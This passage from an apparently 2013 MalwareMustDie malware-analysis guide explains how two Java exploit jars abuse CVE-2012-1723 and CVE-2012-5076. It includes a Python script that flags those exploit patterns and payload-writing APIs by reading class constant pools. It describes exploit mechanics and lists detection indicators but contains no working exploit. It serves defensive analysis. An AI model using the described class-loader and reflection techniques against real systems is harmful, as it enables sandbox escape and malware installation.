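The two patterns called out above can be spotted without running either jar: G.class extends ClassLoader and hands attacker-controlled bytes to defineClass together with a ProtectionDomain (the CVE-2012-1723 pattern), while K.class carries the reflection strings for com.sun.org.glassfish.gmbal.ManagedObjectManagerFactory and GenericConstructor (the CVE-2012-5076 pattern), and axe.class / zin.class write the payload with FileOutputStream. The script below is an added static-triage example, not the kit's code: it parses the constant pool of each .class entry in a jar, reports each class's superclass and any indicator strings, and derives a jar-level verdict. The jar it scans is constructed in memory from hand-built minimal class files named after the page's classes; it is not jimmdemy.jar or torylane.jar, and nothing from the jar is executed.

```python
"""Static triage of a suspicious JAR by constant-pool inspection.

Added example for this write-up (not the kit's code): parse each .class
entry's constant pool, report the superclass and matched indicator strings,
and summarise which exploit patterns and drop-to-disk APIs are present.
The JAR built at the bottom is CONSTRUCTED from minimal hand-made class files
named after the page's classes; it is not jimmdemy.jar or torylane.jar.
"""
import io
import struct
import zipfile

# Indicator strings exactly as they sit in constant-pool Utf8 entries:
# internal names use '/', reflection strings (K.h and K.l above) use '.'.
INDICATORS = {
    "java/lang/ClassLoader": "CVE-2012-1723 pattern: ClassLoader subclass",
    "defineClass": "CVE-2012-1723 pattern: defineClass on attacker bytes",
    "java/security/ProtectionDomain": "CVE-2012-1723 pattern: ProtectionDomain handling",
    "com.sun.org.glassfish.gmbal.ManagedObjectManagerFactory": "CVE-2012-5076 pattern: gmbal factory via reflection",
    "com.sun.org.glassfish.gmbal.util.GenericConstructor": "CVE-2012-5076 pattern: gmbal GenericConstructor via reflection",
    "java/security/PrivilegedExceptionAction": "privileged action wrapper",
    "java/io/FileOutputStream": "file write (payload drop)",
}


def parse_constant_pool(data):
    """Return (utf8 by index, CONSTANT_Class name_index by index, offset after pool)."""
    if struct.unpack(">I", data[:4])[0] != 0xCAFEBABE:
        raise ValueError("not a class file")
    count = struct.unpack(">H", data[8:10])[0]
    utf8, classes, pos, idx = {}, {}, 10, 1
    while idx < count:
        tag, pos = data[pos], pos + 1
        if tag == 1:                           # Utf8: u2 length + bytes
            ln = struct.unpack(">H", data[pos:pos + 2])[0]
            utf8[idx] = data[pos + 2:pos + 2 + ln].decode("utf-8", "replace")
            pos += 2 + ln
        elif tag in (3, 4):                    # Integer, Float
            pos += 4
        elif tag in (5, 6):                    # Long, Double take two slots
            pos += 8
            idx += 1
        elif tag == 7:                         # Class: u2 name_index
            classes[idx] = struct.unpack(">H", data[pos:pos + 2])[0]
            pos += 2
        elif tag in (8, 16, 19, 20):           # String, MethodType, Module, Package
            pos += 2
        elif tag == 15:                        # MethodHandle: u1 kind + u2 index
            pos += 3
        elif tag in (9, 10, 11, 12, 17, 18):   # member refs, NameAndType, Dynamic
            pos += 4
        else:
            raise ValueError("unknown constant pool tag %d" % tag)
        idx += 1
    return utf8, classes, pos


def analyze_class(data):
    """Name, superclass and matched indicators for one class file."""
    utf8, classes, pos = parse_constant_pool(data)
    _flags, this_idx, super_idx = struct.unpack(">HHH", data[pos:pos + 6])
    return {"name": utf8.get(classes.get(this_idx)),
            "super": utf8.get(classes.get(super_idx)),
            "hits": sorted({INDICATORS[s] for s in utf8.values() if s in INDICATORS})}


def triage_jar(jar_bytes):
    """Map every .class entry to its findings; other entries are skipped."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for entry in zf.namelist():
            if entry.endswith(".class"):
                report[entry] = analyze_class(zf.read(entry))
    return report


def verdict(report):
    """CVE patterns seen anywhere in the JAR, and whether it writes files."""
    tags = {h for r in report.values() for h in r["hits"]}
    return {"cves": sorted({t.split(" ")[0] for t in tags if t.startswith("CVE-")}),
            "drops_file": any("payload drop" in t for t in tags)}


# --- constructed sample JAR: minimal class files (header + constant pool only) ---
def build_class(name, superclass, extra_utf8):
    pool = []                                  # (tag, payload); index = 1-based position

    def utf8(s):
        pool.append((1, struct.pack(">H", len(s)) + s.encode()))
        return len(pool)

    def cls(s):
        name_idx = utf8(s)
        pool.append((7, struct.pack(">H", name_idx)))
        return len(pool)

    this_idx, super_idx = cls(name), cls(superclass)
    for s in extra_utf8:
        utf8(s)
    body = b"".join(bytes([t]) + p for t, p in pool)
    header = struct.pack(">IHHH", 0xCAFEBABE, 0, 50, len(pool) + 1)
    return header + body + struct.pack(">HHH", 0x21, this_idx, super_idx)


def sample_jar():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("G.class", build_class("G", "java/lang/ClassLoader",
                    ["defineClass", "java/security/ProtectionDomain"]))
        zf.writestr("axe.class", build_class("axe", "java/lang/Object",
                    ["java/security/PrivilegedExceptionAction", "java/io/FileOutputStream"]))
        zf.writestr("K.class", build_class("K", "java/lang/Object",
                    ["com.sun.org.glassfish.gmbal.ManagedObjectManagerFactory",
                     "com.sun.org.glassfish.gmbal.util.GenericConstructor", "loadClass"]))
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
    return buf.getvalue()


if __name__ == "__main__":
    rep = triage_jar(sample_jar())
    for entry, r in rep.items():
        print(entry, r["name"], "extends", r["super"], r["hits"])
    print(verdict(rep))
```

Reading the constant pool rather than grepping the raw bytes keeps the superclass check exact (the "extends ClassLoader" relationship is what separates the CVE-2012-1723 loader pattern from an ordinary use of the word), and it works on obfuscated jars because class and API names have to survive in the pool even when string constants, like the G.L(...) arguments above, do not.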
  426. -----
  427. #MalwareMustDie | @unixfreaxjp ~]$ date
  428. Tue Jan  8 21:36:28 JST 2013
  429. Title:
  430. #MalwareMustDie - Guide JAR CVE-2012-1723 + CVE-2012-5076